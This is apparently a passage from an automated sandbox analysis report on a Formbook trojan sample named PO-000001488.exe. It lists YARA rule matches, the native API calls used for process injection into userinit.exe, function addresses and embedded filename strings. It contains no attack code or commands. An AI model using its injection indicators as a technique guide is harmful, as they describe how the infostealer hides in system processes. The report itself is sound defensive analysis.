            Source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0042C283 NtClose,3_2_0042C283
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512B60 NtClose,LdrInitializeThunk,3_2_01512B60
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01512DF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01512C70
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015135C0 NtCreateMutant,LdrInitializeThunk,3_2_015135C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01514340 NtSetContextThread,3_2_01514340
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01514650 NtSuspendThread,3_2_01514650
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512BF0 NtAllocateVirtualMemory,3_2_01512BF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512BE0 NtQueryValueKey,3_2_01512BE0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512B80 NtQueryInformationFile,3_2_01512B80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512BA0 NtEnumerateValueKey,3_2_01512BA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512AD0 NtReadFile,3_2_01512AD0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512AF0 NtWriteFile,3_2_01512AF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512AB0 NtWaitForSingleObject,3_2_01512AB0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512D10 NtMapViewOfSection,3_2_01512D10
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512D00 NtSetInformationFile,3_2_01512D00
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512D30 NtUnmapViewOfSection,3_2_01512D30
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512DD0 NtDelayExecution,3_2_01512DD0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512DB0 NtEnumerateKey,3_2_01512DB0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512C60 NtCreateKey,3_2_01512C60
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512C00 NtQueryInformationProcess,3_2_01512C00
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512CC0 NtQueryVirtualMemory,3_2_01512CC0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512CF0 NtOpenProcess,3_2_01512CF0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512CA0 NtQueryInformationToken,3_2_01512CA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512F60 NtCreateProcessEx,3_2_01512F60
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512F30 NtCreateSection,3_2_01512F30
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512FE0 NtCreateFile,3_2_01512FE0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512F90 NtProtectVirtualMemory,3_2_01512F90
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512FB0 NtResumeThread,3_2_01512FB0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512FA0 NtQuerySection,3_2_01512FA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512E30 NtWriteVirtualMemory,3_2_01512E30
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512EE0 NtQueueApcThread,3_2_01512EE0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512E80 NtReadVirtualMemory,3_2_01512E80
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01512EA0 NtAdjustPrivilegesToken,3_2_01512EA0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01513010 NtOpenDirectoryObject,3_2_01513010
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01513090 NtSetValueKey,3_2_01513090
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015139B0 NtGetContextThread,3_2_015139B0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01513D70 NtOpenThread,3_2_01513D70
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01513D10 NtOpenProcessToken,3_2_01513D10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03364340 NtSetContextThread,LdrInitializeThunk,8_2_03364340
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03364650 NtSuspendThread,LdrInitializeThunk,8_2_03364650
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362B60 NtClose,LdrInitializeThunk,8_2_03362B60
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03362BA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03362BF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03362BE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362AF0 NtWriteFile,LdrInitializeThunk,8_2_03362AF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362AD0 NtReadFile,LdrInitializeThunk,8_2_03362AD0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362F30 NtCreateSection,LdrInitializeThunk,8_2_03362F30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362FB0 NtResumeThread,LdrInitializeThunk,8_2_03362FB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362FE0 NtCreateFile,LdrInitializeThunk,8_2_03362FE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03362E80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03362EE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03362D30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03362D10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03362DF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362DD0 NtDelayExecution,LdrInitializeThunk,8_2_03362DD0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03362C70
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362C60 NtCreateKey,LdrInitializeThunk,8_2_03362C60
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03362CA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033635C0 NtCreateMutant,LdrInitializeThunk,8_2_033635C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033639B0 NtGetContextThread,LdrInitializeThunk,8_2_033639B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362B80 NtQueryInformationFile,8_2_03362B80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362AB0 NtWaitForSingleObject,8_2_03362AB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362F60 NtCreateProcessEx,8_2_03362F60
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362FA0 NtQuerySection,8_2_03362FA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362F90 NtProtectVirtualMemory,8_2_03362F90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362E30 NtWriteVirtualMemory,8_2_03362E30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362EA0 NtAdjustPrivilegesToken,8_2_03362EA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362D00 NtSetInformationFile,8_2_03362D00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362DB0 NtEnumerateKey,8_2_03362DB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362C00 NtQueryInformationProcess,8_2_03362C00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362CF0 NtOpenProcess,8_2_03362CF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03362CC0 NtQueryVirtualMemory,8_2_03362CC0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03363010 NtOpenDirectoryObject,8_2_03363010
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03363090 NtSetValueKey,8_2_03363090
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03363D10 NtOpenProcessToken,8_2_03363D10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03363D70 NtOpenThread,8_2_03363D70
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC8D90 NtCreateFile,8_2_00AC8D90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC8F00 NtReadFile,8_2_00AC8F00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC90B0 NtClose,8_2_00AC90B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC9000 NtDeleteFile,8_2_00AC9000
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AC9210 NtAllocateVirtualMemory,8_2_00AC9210
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033F05918_2_033F0591
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D44208_2_033D4420
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E24468_2_033E2446
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033DE4F68_2_033DE4F6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EAB408_2_033EAB40
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E6BD78_2_033E6BD7
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0332EA808_2_0332EA80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033469628_2_03346962
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033329A08_2_033329A0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033FA9A68_2_033FA9A6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0333A8408_2_0333A840
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033328408_2_03332840
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033168B88_2_033168B8
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0335E8F08_2_0335E8F0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03350F308_2_03350F30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D2F308_2_033D2F30
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03372F288_2_03372F28
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033A4F408_2_033A4F40
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033AEFA08_2_033AEFA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0333CFE08_2_0333CFE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03322FC88_2_03322FC8
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EEE268_2_033EEE26
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03330E598_2_03330E59
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03342E908_2_03342E90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033ECE938_2_033ECE93
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EEEDB8_2_033EEEDB
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033CCD1F8_2_033CCD1F
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0333AD008_2_0333AD00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03348DBF8_2_03348DBF
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0332ADE08_2_0332ADE0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03330C008_2_03330C00
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D0CB58_2_033D0CB5
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03320CF28_2_03320CF2
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E132D8_2_033E132D
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0331D34C8_2_0331D34C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0337739A8_2_0337739A
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033352A08_2_033352A0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D12ED8_2_033D12ED
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0334B2C08_2_0334B2C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0331F1728_2_0331F172
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033FB16B8_2_033FB16B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0336516C8_2_0336516C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0333B1B08_2_0333B1B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E70E98_2_033E70E9
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EF0E08_2_033EF0E0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033DF0CC8_2_033DF0CC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033370C08_2_033370C0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EF7B08_2_033EF7B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E16CC8_2_033E16CC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E75718_2_033E7571
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033CD5B08_2_033CD5B0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EF43F8_2_033EF43F
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033214608_2_03321460
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFB768_2_033EFB76
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0334FB808_2_0334FB80
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033A5BF08_2_033A5BF0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0336DBF98_2_0336DBF9
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033A3A6C8_2_033A3A6C
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFA498_2_033EFA49
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E7A468_2_033E7A46
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033CDAAC8_2_033CDAAC
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03375AA08_2_03375AA0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033D1AA38_2_033D1AA3
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033DDAC68_2_033DDAC6
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033C59108_2_033C5910
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033399508_2_03339950
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0334B9508_2_0334B950
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0339D8008_2_0339D800
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033338E08_2_033338E0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFF098_2_033EFF09
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFFB18_2_033EFFB1
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03331F928_2_03331F92
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03339EB08_2_03339EB0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E7D738_2_033E7D73
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033E1D5A8_2_033E1D5A
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_03333D408_2_03333D40
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0334FDC08_2_0334FDC0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033A9C328_2_033A9C32
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_033EFCF28_2_033EFCF2
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB19708_2_00AB1970
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AAC86E8_2_00AAC86E
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AAC8708_2_00AAC870
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AACA908_2_00AACA90
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AAAB108_2_00AAAB10
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB50408_2_00AB5040
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB32208_2_00AB3220
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00AB321B8_2_00AB321B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_00ACB7108_2_00ACB710
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323E3178_2_0323E317
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_032453448_2_03245344
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323E7D08_2_0323E7D0
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323E59B8_2_0323E59B
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323E4348_2_0323E434
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323CAD88_2_0323CAD8
            Source: C:\Windows\SysWOW64\userinit.exeCode function: 8_2_0323D8388_2_0323D838
            Source: C:\Users\user\Desktop\PO-000001488.exe Code function: String function: 01515130 appears 58 times
            Source: C:\Users\user\Desktop\PO-000001488.exe Code function: String function: 0155F290 appears 105 times
            Source: C:\Users\user\Desktop\PO-000001488.exe Code function: String function: 014CB970 appears 280 times
            Source: C:\Users\user\Desktop\PO-000001488.exe Code function: String function: 0154EA12 appears 86 times
            Source: C:\Users\user\Desktop\PO-000001488.exe Code function: String function: 01527E54 appears 103 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 03377E54 appears 102 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 033AF290 appears 105 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 0339EA12 appears 86 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 0331B970 appears 280 times
            Source: C:\Windows\SysWOW64\userinit.exe Code function: String function: 03365130 appears 58 times
            Source: PO-000001488.exe, 00000000.00000002.1603629112.000000000433B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs PO-000001488.exe
            Source: PO-000001488.exe, 00000000.00000002.1605918232.0000000007720000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs PO-000001488.exe
            Source: PO-000001488.exe, 00000000.00000002.1595450169.000000000116E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO-000001488.exe
            Source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUSERINIT.EXEj% vs PO-000001488.exe
            Source: PO-000001488.exe, 00000003.00000002.1769758693.00000000015CD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO-000001488.exe
            Source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001069000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUSERINIT.EXEj% vs PO-000001488.exe
            Source: PO-000001488.exe Binary or memory string: OriginalFilenameAEmo.exe2 vs PO-000001488.exe
            Source: PO-000001488.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: PO-000001488.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, O0UUP8i4yfT9fmLmQP.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, UCmBvFDMba3C8pjQFg.cs Security API names: _0020.SetAccessControl
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, UCmBvFDMba3C8pjQFg.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, UCmBvFDMba3C8pjQFg.cs Security API names: _0020.AddAccessRule
            Source: 0.2.PO-000001488.exe.7720000.4.raw.unpack, O0UUP8i4yfT9fmLmQP.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, UCmBvFDMba3C8pjQFg.cs Security API names: _0020.SetAccessControl
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, UCmBvFDMba3C8pjQFg.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO-000001488.exe.4366550.2.raw.unpack, UCmBvFDMba3C8pjQFg.cs Security API names: _0020.AddAccessRule
            Source: userinit.exe, 00000008.00000002.3309629931.000000000391C000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000037FBC000.00000004.80000000.00040000.00000000.sdmp, PO-000001488.exe Binary or memory string: .vsmidi.sln
